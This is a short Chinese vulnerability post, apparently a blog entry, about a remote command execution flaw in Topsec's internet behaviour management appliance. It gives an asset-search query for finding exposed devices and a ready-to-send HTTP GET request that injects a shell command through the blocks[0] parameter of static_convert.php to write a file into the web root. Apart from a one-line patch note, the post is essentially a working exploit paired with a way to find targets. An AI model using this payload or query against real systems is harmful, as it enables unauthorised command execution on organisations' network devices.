天融信TOPSEC static_convert 远程命令执行漏洞

产品介绍

天融信上网行为管理系统(ACM)是天融信基于多年安全产品研发经验,满足各行各业上网行为管理和内容审计需求而研发的专业设备。它不仅能够防止非法信息传播、敏感信息泄漏,实现实时监控、日志追溯和网络资源管理,还提供强大的用户管理、报表统计分析功能。

漏洞描述

TOPSEC上网行为管理 Static_Convert存在严重的远程命令执行漏洞。攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。

资产测绘

app=“天融信-上网行为管理系统”
在这里插入图片描述

漏洞复现

GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'123'%20>%20/var/www/html/sss.txt%0A HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close


在这里插入图片描述
访问写入文件
在这里插入图片描述
可通过该漏洞执行任意系统命令,请尽快进行修复!

修复建议

已存在该漏洞补丁,请联系软件厂商进行修复。

  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值